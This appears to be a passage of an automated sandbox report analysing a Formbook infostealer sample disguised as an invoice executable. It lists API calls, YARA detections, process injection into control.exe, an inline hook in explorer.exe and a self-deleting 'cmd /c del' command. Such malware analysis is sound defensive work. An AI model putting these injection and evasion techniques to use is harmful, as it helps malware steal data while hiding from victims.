            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012996E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012999D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0129B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012998A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0129A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299A10 NtQuerySection,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0129AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299560 NtWriteFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012995F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0129A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299760 NtOpenProcess,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0129A770 NtOpenThread,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299FE0 NtCreateMutant,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01299650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012996D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DDAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DDA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DDA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DDB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DDA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DD9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E29E90 NtClose,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E29E10 NtReadFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E29F40 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E29D60 NtCreateFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E29E0A NtReadFile,
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E29D5A NtCreateFile,
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 1_2_00B5C2B0
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 1_2_00B59968
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041E000
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00401030
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041D1AB
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041E258
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00401208
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041DD7D
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00402D87
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00402D90
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00409E40
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00409E3B
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041DF3E
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_00402FB0
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041E7B3
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01274120
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0125F900
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0132E824
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01311002
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012820A0
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013220A8
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126B090
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013228EC
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01322B28
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0128EBB0
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131DBD2
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013103DA
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0130FA2B
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013222AE
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01250D20
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01322D07
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01321D55
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01282581
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126D5E0
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_013225DD
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0126841F
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131D466
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01321FF1
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0132DFCE
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01276E30
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0131D616
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_01322EF7
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5D466
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DA841F
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAD5E0
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E625DD
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC2581
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E61D55
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E62D07
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D90D20
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E62EF7
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB6E30
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5D616
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E61FF1
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E6DFCE
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E628EC
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DAB090
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E620A8
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DC20A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E6E824
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E51002
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04D9F900
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E622AE
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E5DBD2
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E503DA
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DCEBB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04E62B28
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2E258
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2E000
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2D1AB
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E19E40
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E19E3B
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E12FB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E12D87
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E12D90
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: String function: 0125B150 appears 45 times
            Source: C:\Windows\SysWOW64\control.exeCode function: String function: 04D9B150 appears 35 times
            Source: INv02938727.exeBinary or memory string: OriginalFilename vs INv02938727.exe
            Source: INv02938727.exe, 00000001.00000002.250096553.00000000026D1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs INv02938727.exe
            Source: INv02938727.exe, 00000001.00000002.248567482.00000000000D2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSafeHeapHandleCache.exe0 vs INv02938727.exe
            Source: INv02938727.exe, 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs INv02938727.exe
            Source: INv02938727.exeBinary or memory string: OriginalFilename vs INv02938727.exe
            Source: INv02938727.exe, 00000002.00000002.318304038.000000000134F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INv02938727.exe
            Source: INv02938727.exe, 00000002.00000002.315939770.00000000007F2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameSafeHeapHandleCache.exe0 vs INv02938727.exe
            Source: INv02938727.exe, 00000002.00000002.319510745.0000000003395000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs INv02938727.exe
            Source: INv02938727.exeBinary or memory string: OriginalFilenameSafeHeapHandleCache.exe0 vs INv02938727.exe
            Source: INv02938727.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.511352331.0000000003250000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.315850834.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.319119238.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.318875826.0000000001590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.509884177.0000000002E10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.250754758.00000000036D9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.512153616.0000000004B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.INv02938727.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.INv02938727.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: INv02938727.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@9/1@3/3
            Source: C:\Users\user\Desktop\INv02938727.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INv02938727.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_01
            Source: INv02938727.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\INv02938727.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\INv02938727.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
            Source: INv02938727.exe, 00000001.00000002.250197867.0000000002726000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
            Source: INv02938727.exeVirustotal: Detection: 61%
            Source: INv02938727.exeMetadefender: Detection: 35%
            Source: INv02938727.exeReversingLabs: Detection: 68%
            Source: unknownProcess created: C:\Users\user\Desktop\INv02938727.exe 'C:\Users\user\Desktop\INv02938727.exe'
            Source: C:\Users\user\Desktop\INv02938727.exeProcess created: C:\Users\user\Desktop\INv02938727.exe C:\Users\user\Desktop\INv02938727.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
            Source: C:\Users\user\Desktop\INv02938727.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INv02938727.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\INv02938727.exeProcess created: C:\Users\user\Desktop\INv02938727.exe C:\Users\user\Desktop\INv02938727.exe
            Source: C:\Users\user\Desktop\INv02938727.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\INv02938727.exe'
            Source: C:\Users\user\Desktop\INv02938727.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: INv02938727.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: INv02938727.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wntdll.pdbUGP source: INv02938727.exe, 00000002.00000002.318304038.000000000134F000.00000040.00000001.sdmp, control.exe, 0000000F.00000002.512781049.0000000004E8F000.00000040.00000001.sdmp
            Source: Binary string: control.pdb source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: INv02938727.exe, control.exe
            Source: Binary string: control.pdbUGP source: INv02938727.exe, 00000002.00000002.319494012.0000000003390000.00000040.00000001.sdmp
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041721D push es; ret
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_004175DF push ds; iretd
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_004175A0 push ds; iretd
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041B68C pushad ; iretd
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041CEB5 push eax; ret
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041CF6C push eax; ret
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041CF02 push eax; ret
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_0041CF0B push eax; ret
            Source: C:\Users\user\Desktop\INv02938727.exeCode function: 2_2_012AD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_04DED0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2721D push es; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2CEB5 push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2B68C pushad ; iretd
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2CF6C push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2CF02 push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E2CF0B push eax; ret
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E275DF push ds; iretd
            Source: C:\Windows\SysWOW64\control.exeCode function: 15_2_02E275A0 push ds; iretd
            Source: initial sampleStatic PE information: section name: .text entropy: 7.70994295605

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xE6
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\INv02938727.exeProcess information set: NOOPENFILEERRORBOX
